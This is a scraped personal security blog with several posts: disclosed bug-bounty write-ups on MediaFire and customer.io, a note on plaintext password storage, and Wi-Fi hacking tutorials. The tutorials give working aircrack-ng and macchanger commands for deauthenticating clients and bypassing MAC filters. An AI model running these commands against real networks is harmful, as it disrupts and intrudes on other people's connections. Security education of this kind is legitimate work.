<b>2. Pro (Paid) :- It has more features as it is paid much larger bandwidth and 100GB Storage.</b><br />
<b>3. Business (Paid) :- For teams, all Mediafire features like you an add other users , you can customize download page , you can increase bandwidth, you can export folder as zip, you can download the Logs of the users.</b><br />
<b><br /></b>
<b><br /></b>
<b>As It requires an international credit or debit card to create a Pro or Business , so I created an Basic account for free and started looking at the functionality.</b><br />
<b><br /></b>
<b>Most features like deleting files, generating one time download link etc are using the Mediafire API. So i quickly looked at the documentation of the API. You can find the Mediafire API <a href="https://www.mediafire.com/developers/" rel="nofollow" target="_blank">Here</a>.</b><br />
<b><br /></b>
<b>So On login what is happening:-</b><br />
<b>Whenever you do login to your account it generates a authenticity_token. The life of token is for 10 minutes after that it renew the token using this API call </b><br />
<div style="text-align: left;">
<span style="color: #38761d; font-family: "menlo" , "monaco" , "courier new" , monospace;"><span style="background-color: #f9f9f9; font-size: 11px;">https://www.mediafire.com/api/1.5/user/renew_session_token.php</span></span></div>
<b>but if you session is ideal for 5-7 minutes then you have to enter the password again to renew the token. </b><br />
<b><br /></b>
<br />
<h3 style="text-align: left;">
<b>The Bug:-</b></h3>
<div>
<b>So actually I was looking at some of their functionality but due to some work I did logout from my account. and after doing logout. It redirected me to a page which says </b></div>
<div>
<b><br /></b></div>
<div>
<b><u></u></b><br />
<div>
<b><u>This account has been locked.</u></b></div>
<b><u>
</u></b>
<div>
<b><u>See our page about account suspensions for more information.</u></b></div>
<b><u>
</u></b></div>
<div>
<b><br /></b></div>
<div>
<b>I was like WHAT I DID WRONG ? :(</b></div>
<div>
<b><br /></b></div>
<div>
<b>So as after sometime after completing the work. I came back and tried to login again but after redirecting me to the home page it again redirects to me on that page where it shows that the account is suspended.</b></div>
<div>
<b><br /></b></div>
<div>
<b>Now I fired burp and started looking that what actually going on.</b></div>
<div>
<br /></div>
<div>
<b>1. After login it generates the authenticity token and redirects to home page </b></div>
<div>
<b>2. After verifying that this is a suspended account it redirects me to that page which shows the warning.</b></div>
<div>
<b><br /></b></div>
<div>
<b>So I can do anything using the WebApp.</b></div>
<div>
<b>I started looking at the Mediafire API and tried one API call which is about creating a folder using API http://www.mediafire.com/api/1.5/folder/create.php</b></div>
<div>
<b><br /></b></div>
<div>
<b>Now I copied the authenticity token which was generated during the login and tried to create a folder and </b><b>It was successful.</b></div>
<div>
<b><br /></b></div>
<div>
<b>I can also access files etc using the Mediafire Android App.</b></div>
<div>
<b><br /></b></div>
<div>
<b>So what is actually happening that API is generating the token but not invalidating it after confirming that the account is suspended and using the API I can access the most of the features of Mediafire.</b></div>
<div>
<b><br /></b></div>
<div>
<b>So Now as a fix Mediafire invalidates the token as soon as they confirms that the account is suspended. and using the mobile application you can't use any features with suspended account. </b></div>
<div>
<b><br /></b></div>
<div>
<b></b><br />
<div>
<b>Disclosure Timeline</b></div>
<b>
</b>
<div>
<b>27-Feb-2016: Reported</b></div>
<b>
<div>
9-Mar-2016: First response received > Looking at this report</div>
<div>
14-Mar-2016: Bounty Awarded(Certificate and pro account)</div>
<div>
15-Mar-2016: Resolved</div>
<div>
27-Feb-2017: Disclosed</div>
</b></div>
<b><br /></b>
<b><br /></b>
<b>Thanks </b><br />
Jitendra K Singh (Team Computer Korner)<br />
<br />
<b>Feel Free To Leave A Comment</b>
<b>If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You! </b>
<br />
<center>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input name="cmd" type="hidden" value="_donations" /> <input name="business" type="hidden" value="ssutradhar35@gmail.com" /> <input name="lc" type="hidden" value="IN" /> <input name="item_name" type="hidden" value="Computer Korner" /> <input name="no_note" type="hidden" value="0" /> <input name="currency_code" type="hidden" value="USD" /> <input name="bn" type="hidden" value="PP-DonationsBF:btn_donateCC_LG.gif:NonHostedGuest" /> <input alt="PayPal — The safer, easier way to pay online." border="0" name="submit" src="https://www.paypalobjects.com/en_GB/i/btn/btn_donateCC_LG.gif" type="image" /> <img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" /> </form>
</center>
</div>
Jitendrahttp://www.blogger.com/profile/12006899852837970196noreply@blogger.com1tag:blogger.com,1999:blog-5302093523789144315.post-426609659638512622017-01-31T13:01:00.000+05:302017-01-31T13:01:04.656+05:30Website Sends the Actual Password on the Mobile Number: Considered as the Severe Vulnerability or Not ?<div dir="ltr" style="text-align: left;" trbidi="on">
<b><br /></b>
<b>Hi there,</b><br />
<b><br /></b>
<b><br /></b>
<b>I was just looking at some website which provides free SMS sending service. There are a lot of website which provides this functionality in India. </b><br />
<b>So what is a SMS</b><br />
<b><br /></b>
<b>SMS stands for Short Messaging Service. It uses standardized communication protocols to enable mobile phone devices to exchange short text messages.</b><br />
<b><br /></b>
<b>There are a lots of website which you can use to send free SMS to a mobile phone all you need to create an account on your desired website and you are ready.</b><br />
<b><br /></b>
<b>Now I just looked one of the website like that I am not going to mention it's name lets call it site.com.</b><br />
<b>So on site.com you can use your mobile no to create an account they will deliver a temporary password to you on the given number and after login you have to change the password to your desired one.</b><br />
<b><br /></b>
<b>Now what is going to happen if you forgot your password. So in case that you forgot your password just enter your mobile no on their password reset page and they will send the password you were using on that website , its pretty simple.</b><br />
<b>So you noticed anything which can create a risk or threat ?</b><br />
<b>Some can understand but for the others let me explain that ?</b><br />
<b><br /></b>
<b><br /></b>
<b>They are not using any hashing algorithm for hashing the password.</b><br />
<b>If a password is hashed then it can't be converted to the actual text you can only compare other hashes in order to guess the actual word.</b><br />
<b><br /></b>
<b>Now how I identified that this website is not using any hashing algorithm ?</b><br />
<b><br /></b>
<b>As I mentioned earlier that once a text is converted into hash it can't be converted back to the actual word from which the hash is generated.</b><br />
<b> As the site.com is sending the actual password on the mobile phone it tells us that they are not using any hashing algorithms.</b><br />
<b>As they are not using the most important security layer of password hashing. Then how you are going to trust this website maybe they are saving all the contacts you added and the message you sent in actual format giving a chance to Hackers to steal all of your info if they got access to the database of that website.</b><br />
<br />
<b><br /></b>
<br />
<b><br /></b>
<b>So I will suggest you that you shouldn't have to use those sites which are not providing the most common security layer to its users.</b><br />
<b><br /></b>
<b>Now the decision is on you do you want to let your private information to be publicly available ? </b><br />
<b>If not then beware !!! ..........</b><br />
<b><br /></b>
<b>Have a Good Day </b><br />
<b><br /></b>
<b>Thanks</b><br />
<b><br /></b>
<b>Jitendra K Singh (Team Computer Korner) </b><br />
<b><br /></b><b>Special thanks to Moto G</b>
<b><br /></b>
<b>Feel Free To Leave A Comment</b>
<b>If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You! </b>
<br />
<center>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input name="cmd" type="hidden" value="_donations" /> <input name="business" type="hidden" value="ssutradhar35@gmail.com" /> <input name="lc" type="hidden" value="IN" /> <input name="item_name" type="hidden" value="Computer Korner" /> <input name="no_note" type="hidden" value="0" /> <input name="currency_code" type="hidden" value="USD" /> <input name="bn" type="hidden" value="PP-DonationsBF:btn_donateCC_LG.gif:NonHostedGuest" /> <input alt="PayPal — The safer, easier way to pay online." border="0" name="submit" src="https://www.paypalobjects.com/en_GB/i/btn/btn_donateCC_LG.gif" type="image" /> <img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" /> </form>
</center>
</div>
Jitendrahttp://www.blogger.com/profile/12006899852837970196noreply@blogger.com0tag:blogger.com,1999:blog-5302093523789144315.post-52810671506440622392016-12-03T13:29:00.001+05:302016-12-03T13:34:55.108+05:30Bug Bounty: Vulnerability In customer.io<div dir="ltr" style="text-align: left;" trbidi="on">
<b><br /></b>
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://encrypted-tbn3.gstatic.com/images?q=tbn:ANd9GcQmIgxmYOjx1_o8Twk9D7emuFerUU-znGWPMo0EFmrfYrBdimqFng" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://encrypted-tbn3.gstatic.com/images?q=tbn:ANd9GcQmIgxmYOjx1_o8Twk9D7emuFerUU-znGWPMo0EFmrfYrBdimqFng" /></a></div>
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b>Hi there,</b><br />
<b><br /></b>
<b>First of all sorry for this long pause from my side I was busy in somethings and it took me some time to sort out all the things.</b><br />
<b><br /></b>
<b>So in this post I am going to discuss about a vulnerability I found in customer.io.</b><br />
<b><br /></b>
<b>About customer.io:-</b><br />
<b>A light integration sends the Customer.io platform customer behavior data from your web or mobile app. Then you can start sending messages based on what users do or don't do after they log in. Increase engagement, revenue, and customer success.</b><br />
<br />
<br />
<br />
<b>I was looking at SPF record of some company and i found the that some companies have customer.io in their spf record the are allowing customer.io to send emails on their behalf.</b><br />
<b>SO i directly went to customer.io and created an account.</b><br />
<b>after creating an account I created a template for sending this as an email.</b><br />
<b>Now you can add as many email account you want for sending email so I tried saving an email of a site which have customer.io in their spf record. The email address no-reply@example.com(I dont want to disclose the website).</b><br />
<b>the email was added succesfully but after this one problem arised that customer.io doesnt let me send the email from that second email address i have added to my account.</b><br />
<b>so there are two conditions:-</b><br />
<b><br /></b>
<b>1. When creating an account you have to verify the email address.</b><br />
<b>2. You can only send the email from the email you have used while creating the account.</b><br />
<b><br /></b>
<b>So i tried some ideas like sending an email capturing that request with burp and modifying the email but these doesn't work.</b><br />
<b><br /></b>
<b>While adding the email there was an option to edit my primary email. thats looks something vulnerable to I clicked on edit the email and editing my primary email to no-reply@example.com and it was successful. Now I can send the emails on the behalf of the customers of that company.</b><br />
<b><br /></b>
<b>First of all I reported this to some of his customers who were vulnerable to this after that i wrote and email to customer.io and explained this to them.</b><br />
<b>they told me that they are fixing this ASAP but since they dont have an bug bounty program they are no rewarding me anything. That was fine because I dont this testing for exploring and gaining knowledge.</b><br />
<b><br /></b>
<b>They send me reply >24 hour of reporting this and I was happy with their quick response.</b><br />
<br />
<h4 style="text-align: left;">
FIX</h4>
<div>
<b>They did two thing to fix this vulnerability first of all they blocked my account. 😁😁😁😁😁😁😁😁😁😁. and after that they added domain verification whenever you try to add an email you have to verify its ownership. </b><br />
<b><br /></b>
<br /></div>
<div>
<b><br /></b></div>
<div>
<b>Hope you liked it </b></div>
<div>
<b><br /></b></div>
<div>
<b>Thanks </b></div>
<div>
<b>Jitendra K Singh(Team Computer Korner)</b></div>
<br />
<b>Feel Free To Leave A Comment</b>
<b>If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You! </b>
<br />
<center>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input name="cmd" type="hidden" value="_donations" /> <input name="business" type="hidden" value="ssutradhar35@gmail.com" /> <input name="lc" type="hidden" value="IN" /> <input name="item_name" type="hidden" value="Computer Korner" /> <input name="no_note" type="hidden" value="0" /> <input name="currency_code" type="hidden" value="USD" /> <input name="bn" type="hidden" value="PP-DonationsBF:btn_donateCC_LG.gif:NonHostedGuest" /> <input alt="PayPal — The safer, easier way to pay online." border="0" name="submit" src="https://www.paypalobjects.com/en_GB/i/btn/btn_donateCC_LG.gif" type="image" /> <img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" /> </form>
</center>
</div>
Jitendrahttp://www.blogger.com/profile/12006899852837970196noreply@blogger.com0tag:blogger.com,1999:blog-5302093523789144315.post-10779443586392931382016-08-12T00:31:00.000+05:302016-08-12T00:31:30.808+05:30Wi-Fi Hacking: Deauthentication Attack<div dir="ltr" style="text-align: left;" trbidi="on">
<b><br /></b>
<b>Hi there,</b><br />
<b><br /></b>
<b>So this post is about deauthentication attack.</b><br />
<b>So we can do a deauthentication attack without connecting to a target network.</b><br />
<b><br /></b>
<h3 style="text-align: left;">
<b>How It works:-</b></h3>
<div>
<b>So in this process aireplay-ng sends deauthenticate packets to both AP(Access Point or router) and client which is connected to it.</b></div>
<div>
<b>It sends spoof packets to AP and also some packets to client when AP acknowledges a packets which says that the target client is not authenticated to the AP. </b></div>
<div>
<b>In other words attackers sends some deauth packets to the AP pretending to be the client and in the same time attackers send deauth packets to the client pretending to be the router saying that you need to authenticate again.</b></div>
<div>
<b><br /></b></div>
<div>
<b><br /></b></div>
<h3 style="text-align: left;">
How We can do this attack:-</h3>
<div>
So we need aircrack suite to carry out this attack. lets start</div>
<div>
<br /></div>
<div>
<ol style="text-align: left;">
<li><b>First of all you should have to a wireless card in monitor mode to enable this type<br />airmon-ng start [Your wifi card name] and press enter it will enable a wireless card in monitor mode.</b></li>
<li><b>Now scan all networks by typing<br />airodump-ng [Your wireless card in monitor mode]</b></li>
<li><div class="separator" style="clear: both; text-align: center;">
<b style="text-align: left;"></b></div>
<div class="separator" style="clear: both; display: inline !important; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9l_AY6mRCQNHURxPp2wK1jYlBaA8Nx49CsQ32d0ye1FUKjMW5LNMv4zE-srvMz46ElyWkrn62WwUdEJPwpUxcXluSWFR9ZU_45aWZJ8Y4XFZKsqcfz1lm_chklYfC6whKZ-QbrBonGho/s1600/all_network.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9l_AY6mRCQNHURxPp2wK1jYlBaA8Nx49CsQ32d0ye1FUKjMW5LNMv4zE-srvMz46ElyWkrn62WwUdEJPwpUxcXluSWFR9ZU_45aWZJ8Y4XFZKsqcfz1lm_chklYfC6whKZ-QbrBonGho/s320/all_network.png" width="320" /></a></div>
</li>
</ol>
</div>
<b>I have censored some information. after scanning network choose the AP on which you want to deauth a client. </b><br />
<b><br /></b>
<b><br /></b>
<b>4. Now to deauthenicate a specific client first of all look how many clients are associated to that network to do this simply type</b><br />
<b>airodump-ng --channel [no] --bssid [mac of target network] [wifi card in monitor mode] and press enter</b><br />
<b><br /></b>
<b>it will give a output like this </b><br />
<div class="separator" style="clear: both; text-align: center;">
<b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiN9iR_OSLxtYspm1uYfSQ0bC57sT17PDulXJQB3URetexlYtxgfHo2Kv0GZFu5erXKbJABKVQmWW0FfqH8KexcK2UVMzrfw62Ew3uKiUM0_nmRRpCF3NMgnHGfRpPogtkXIR4K27CqIFA/s1600/devices_connected_to_netw.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiN9iR_OSLxtYspm1uYfSQ0bC57sT17PDulXJQB3URetexlYtxgfHo2Kv0GZFu5erXKbJABKVQmWW0FfqH8KexcK2UVMzrfw62Ew3uKiUM0_nmRRpCF3NMgnHGfRpPogtkXIR4K27CqIFA/s320/devices_connected_to_netw.png" width="320" /></a></b></div>
<br />
<b><br /></b>
<b>5. Now to deauthenticate the client use this command</b><br />
<b>aireplay-ng --deauth [no of packets you want to send] -a [AP's MAC address] -c [client Mac address] [wifi card in monitor mode]</b><br />
<b> if you want to deauthenticate the client for a long time you can set a large value of [no of packets] like 10000 etc.</b><br />
<b><br /></b>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqcfwMy_uUigUinrA7kRJ1mDmRkbK_tDfM5QUS97CC6fFULUdIhZSaAJDAKrprfYv10QupaIjKDKldon9hwbyyrNI2bVN2SXE3sI4eXyfnPVhBRqcIDLXE2JcGqoHi0nBYXPNAHHvbqUQ/s1600/deauthenticated.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqcfwMy_uUigUinrA7kRJ1mDmRkbK_tDfM5QUS97CC6fFULUdIhZSaAJDAKrprfYv10QupaIjKDKldon9hwbyyrNI2bVN2SXE3sI4eXyfnPVhBRqcIDLXE2JcGqoHi0nBYXPNAHHvbqUQ/s320/deauthenticated.png" width="320" /></a></div>
<b>So after this the client will be not be able to authenticate to the target network.</b><br />
<b><br /></b>
<b>Hope you enjoyed reading this.</b><br />
<b>Next Post: Cracking WEP encryption Practical </b><br />
<b><br /></b>
<b><br /></b>
<b>Regards</b><br />
<b>Jitendra (Team Computer Korner)</b><br />
<b><br /></b>
<b><br /></b>
<b>Feel Free To Leave A Comment</b>
<b>If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You! </b>
<br />
<center>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input name="cmd" type="hidden" value="_donations" /> <input name="business" type="hidden" value="ssutradhar35@gmail.com" /> <input name="lc" type="hidden" value="IN" /> <input name="item_name" type="hidden" value="Computer Korner" /> <input name="no_note" type="hidden" value="0" /> <input name="currency_code" type="hidden" value="USD" /> <input name="bn" type="hidden" value="PP-DonationsBF:btn_donateCC_LG.gif:NonHostedGuest" /> <input alt="PayPal — The safer, easier way to pay online." border="0" name="submit" src="https://www.paypalobjects.com/en_GB/i/btn/btn_donateCC_LG.gif" type="image" /> <img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" /> </form>
</center>
</div>
Jitendrahttp://www.blogger.com/profile/12006899852837970196noreply@blogger.com1tag:blogger.com,1999:blog-5302093523789144315.post-7604533396262427952016-08-04T00:07:00.000+05:302016-08-04T00:27:00.194+05:30WEP encryption: How it works and its weakness <div dir="ltr" style="text-align: left;" trbidi="on">
<b><br /></b>
<b><br /></b>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.hot-spotwifi.com/assets/wifi-158401_1280.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.hot-spotwifi.com/assets/wifi-158401_1280.png" height="230" width="320" /></a></div>
<b><br /></b>
<b>Hi there,</b><br />
<b><br /></b>
<b>First of all sorry for the delay as I was on vacations but finally I am back with a new post.</b><br />
<br />
<b>So I past few posts we talked about MAC address and how to login to a AP which has a MAC filter enabled on it.</b><br />
<b>So now we will talk about Encryption and How to Crack it.</b><br />
<b>Our first topic is about WEP encryption.</b><br />
<b><br /></b>
<b>So lets start:-</b><br />
<b><br /></b>
<b>WEP is an old encryption but still it is used in many networks to provide data confidentially that's why we are learning how to break it.</b><br />
<b>WEP stands for Wired Equivalent Privacy. It was designed to provide the data confidentially as compared to the wired networks.</b><br />
<b><br /></b>
<b><br /></b>
<br />
<h3 style="text-align: left;">
<b>Introduction:-</b></h3>
<b>WEP uses a algorithm which is known as the Rivest Cipher 4 algorithm. RC4 is designed by Ron Rivest of RSA security in 1987.</b><br />
<b>In RC4 algorithm data packets is encrypted at AP (access point) and then decrypted at the client. Here what WEP does that it ensures that each packet has its unique keystream by using a random 24-bit Initializing Vector(IV) and it is not encrypted. It means that you are able to capture a data packets then you will be able to read the IV.</b><br />
<b><br /></b>
<b><br /></b>
<h3 style="text-align: left;">
<b>Authentication:-</b></h3>
<div>
<b>There are two types of authentication that are used in WEP encryption </b></div>
<div>
<b>1. Open System Authentication:- It this authentication the WLAN client need not to provide its credentials to the access point for the authentication.</b></div>
<div>
<b>2. Shared Key Authentication:- It takes place by following ways.</b></div>
<div>
<b>The client sends the authentication request to the AP.</b></div>
<div>
<b>The AP reply with a clear text challenge.</b></div>
<div>
<b>After these two steps the client encrypt the clear text challenge using the configured or entered WEP key and sends its back to the AP.</b></div>
<div>
<b>Now AP decrypts the response if this matches the challenge text then you will be authenticated otherwise a negative reply will be received.</b></div>
<div>
<b><br /></b></div>
<h3 style="text-align: left;">
<b>Cracking:-</b></h3>
<div>
<b><br /></b></div>
<b>So the Weakness here is IV was generated by 24-bit Initializing vector.</b><br />
<b>So in a busy network the possibility of randomness will not work because there will be too much packets which are received or sent and the IV are always generated by 24 bit random IV.</b><br />
<br />
<b>So we can collect more than two packets which have the same Initializing vector. and After that we can use aircrack-ng to determine the key stream and the WEP key.</b><br />
<br />
<b>If you captured lot of packets then the chances of determining key will increase.</b><br />
<b><br /></b>
<b><br /></b>
<b>We will be doing the demonstration of Cracking WEP in next post.</b><br />
<b>Stay tuned </b><br />
<b><br /></b>
<b><br /></b>
<b>Regards</b><br />
<b>Jitendra(Team Computer Korner)</b><br />
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b>Feel Free To Leave A Comment</b>
<b>If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You! </b>
<br />
<center>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input name="cmd" type="hidden" value="_donations" /> <input name="business" type="hidden" value="ssutradhar35@gmail.com" /> <input name="lc" type="hidden" value="IN" /> <input name="item_name" type="hidden" value="Computer Korner" /> <input name="no_note" type="hidden" value="0" /> <input name="currency_code" type="hidden" value="USD" /> <input name="bn" type="hidden" value="PP-DonationsBF:btn_donateCC_LG.gif:NonHostedGuest" /> <input alt="PayPal — The safer, easier way to pay online." border="0" name="submit" src="https://www.paypalobjects.com/en_GB/i/btn/btn_donateCC_LG.gif" type="image" /> <img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" /> </form>
</center>
</div>
Jitendrahttp://www.blogger.com/profile/12006899852837970196noreply@blogger.com0tag:blogger.com,1999:blog-5302093523789144315.post-10084407564183891492016-07-03T00:47:00.001+05:302016-07-03T00:47:34.193+05:30Accessing an AP Which have a MAC filter enabled <div dir="ltr" style="text-align: left;" trbidi="on">
<b><br /></b>
<b>So in the previous post I was talking about what is MAC address and I explained how to find your MAC address etc.</b><br />
<b>Now there are certain Wi-Fi networks which uses MAC filter to give access to their clients. </b><br />
<b>MAC filter consist a whitelist of a MAC addresses. So a user can connect to that network only when his MAC address exists in that whitelist.</b><br />
<b><br /></b>
<b>So let suppose if you know the password of a network(Access Point) but they have MAC filter enabled they you will not be able to connect to that network.</b><br />
<b><br /></b>
<b>So in this post we will bypass the MAC filter of a router to get access to that network.</b><br />
<b><br /></b>
<b>So we will first of all check the devices connected to a AP then we will change our MAC address and since we know the password we can connect to that network.</b><br />
<b><br /></b>
<h4 style="text-align: left;">
<b>Tools we are going to use in this </b></h4>
<div>
<ol style="text-align: left;">
<li><b> aircrack-ng suite </b></li>
<li><b>MAC changer</b></li>
</ol>
<b>lets start </b></div>
<div>
<b><br /></b></div>
<div>
<b>1. First of all we need to enable our network card in monitor mode so we can able to caputre all the packets. our card is managed mode in default so we have to enable managed mode.</b></div>
<div>
<b>my network card name is wlan0.</b></div>
<div>
<b>open terminal in kali and give this command</b></div>
<div>
<b><br /></b></div>
<div>
<b><i><u>airmon-ng start wlan0</u></i></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAlgSO2wDu0iwubDVNbvUg9pgzklZx8c1LXscjn6n30uX8_QS8V4HFMvkPgHu8Yqc9t3VJVMtdLtB7GlznsjmkSh-rOleZHMFKMUsRUuz4jpYdSDqO3V-a0ZUGX9HCrSlgkeyUTYq91aA/s1600/airmon.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAlgSO2wDu0iwubDVNbvUg9pgzklZx8c1LXscjn6n30uX8_QS8V4HFMvkPgHu8Yqc9t3VJVMtdLtB7GlznsjmkSh-rOleZHMFKMUsRUuz4jpYdSDqO3V-a0ZUGX9HCrSlgkeyUTYq91aA/s320/airmon.png" width="320" /></a></div>
<div>
<b><i><u><br /></u></i></b></div>
<div>
<b><i><u><br /></u></i></b></div>
<div>
<b>it will start a network card in monitor mode and it will be mon0</b></div>
<div>
<b><br /></b></div>
<div>
<b>2. Now we can monitor all the networks in our wifi card range so to monitor all the network give this command </b></div>
<div>
<b><br /></b></div>
<div>
<b><br /></b></div>
<b><i><u>airodump-ng mon0</u></i></b><br />
<b><i><u><br /></u></i></b>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgr4_zLWBbg47YZejeuSX6TX6x7TSptsUiTSu2UzQOE-BMJk2NetTDgh4cs5idphu18yvNw503IOFVxQMBpzShB-1O1DED6GpA1RcHO-0Ksn9Yu-8wAJlZYBBUE4rLEhurHwvUy8N4B738/s1600/airodump.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgr4_zLWBbg47YZejeuSX6TX6x7TSptsUiTSu2UzQOE-BMJk2NetTDgh4cs5idphu18yvNw503IOFVxQMBpzShB-1O1DED6GpA1RcHO-0Ksn9Yu-8wAJlZYBBUE4rLEhurHwvUy8N4B738/s320/airodump.png" width="320" /></a></div>
<b><i><u><br /></u></i></b>
<b><i><u><br /></u></i></b>
<b>Now here bssid is the MAC address of the network </b><br />
<b>ch = channel</b><br />
<b>PWR = our distance</b><br />
<b>Data= Data packets transferred</b><br />
<b>ENC= Encryption used</b><br />
<b><br /></b>
<b>3. so now to monitor all the devies connected to the network open terminal and type </b><br />
<b><br /></b>
<b><i><u>airodump-ng --bssid <Mac address of network> --channel <channel> wifi _card_in_Monitor_mode</u></i></b><br />
<b><i><u><br /></u></i></b>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgl8FdF_1XnTykTIqWdPglpqBFPE0wUxjhTpgUoFXsHfBQDVzjMsV5zpt6tkKuuvUCOUBLgJmQfHWedgCiG6Wt7503JdDJXlZ4slZ9w5CHSWv4oBryBetJOk9Pf_w9lqPu0sMP148HG-jU/s1600/device_conn.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgl8FdF_1XnTykTIqWdPglpqBFPE0wUxjhTpgUoFXsHfBQDVzjMsV5zpt6tkKuuvUCOUBLgJmQfHWedgCiG6Wt7503JdDJXlZ4slZ9w5CHSWv4oBryBetJOk9Pf_w9lqPu0sMP148HG-jU/s320/device_conn.png" width="320" /></a></div>
<b><i><u><br /></u></i></b>
<b><i><u><br /></u></i></b>
<b>Now if will show you all the connected devices MAC address under the station field </b><br />
<b>copy any of them.</b><br />
<b><br /></b>
<b><br /></b>
<b>Now give this command to change your MAC address to a MAC which is whitelist (copied in step 3) </b><br />
<b><i><u>ifconfig wlan0 down</u></i></b><br />
<b><i><u>macchanger --mac <MAC copied in step 3></u></i></b><br />
<b><i><u>ifconfig wlan0 up</u></i></b><br />
<b><i><u><br /></u></i></b>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjDiSTV2SLW4e3YehnAtouU_y56n3NLZc3d7qr0CdVCPY_YG6u1_tbhmU1cIfwmK8JTrtE3gA4hNoLxKAWB1l3lQNz2mxBG5u7v9DK9jEXPPlzJc0nfFgOrE9bArfXpsJ4wOa9g8c12zc/s1600/macchanger.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjDiSTV2SLW4e3YehnAtouU_y56n3NLZc3d7qr0CdVCPY_YG6u1_tbhmU1cIfwmK8JTrtE3gA4hNoLxKAWB1l3lQNz2mxBG5u7v9DK9jEXPPlzJc0nfFgOrE9bArfXpsJ4wOa9g8c12zc/s320/macchanger.png" width="320" /></a></div>
<b><i><u><br /></u></i></b>
<b><i><u><br /></u></i></b>
<b>Now enter the password and you will be successfully able to connect to the network which has mac filter enabled.</b><br />
<br />
<br />
<br />
<b>Note: To restore the permanent mac address again type >>macchanger -p</b><br />
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b>Hope this helped </b><br />
<b><br /></b>
<b>Feel free to comment</b><br />
<b><br /></b>
<b>Thanks</b><br />
<b>Jitendra K Singh(Team Computer Korner)</b><br />
<b><br /></b>
<b><br /></b>
<b>Feel Free To Leave A Comment</b>
<b>If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You! </b>
<br />
<center>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input name="cmd" type="hidden" value="_donations" /> <input name="business" type="hidden" value="ssutradhar35@gmail.com" /> <input name="lc" type="hidden" value="IN" /> <input name="item_name" type="hidden" value="Computer Korner" /> <input name="no_note" type="hidden" value="0" /> <input name="currency_code" type="hidden" value="USD" /> <input name="bn" type="hidden" value="PP-DonationsBF:btn_donateCC_LG.gif:NonHostedGuest" /> <input alt="PayPal — The safer, easier way to pay online." border="0" name="submit" src="https://www.paypalobjects.com/en_GB/i/btn/btn_donateCC_LG.gif" type="image" /> <img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" /> </form>
</center>
</div>
Jitendrahttp://www.blogger.com/profile/12006899852837970196noreply@blogger.com0tag:blogger.com,1999:blog-5302093523789144315.post-83944323259747107782016-06-26T14:44:00.000+05:302016-06-26T14:44:16.702+05:30What is MAC: Explanation <div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
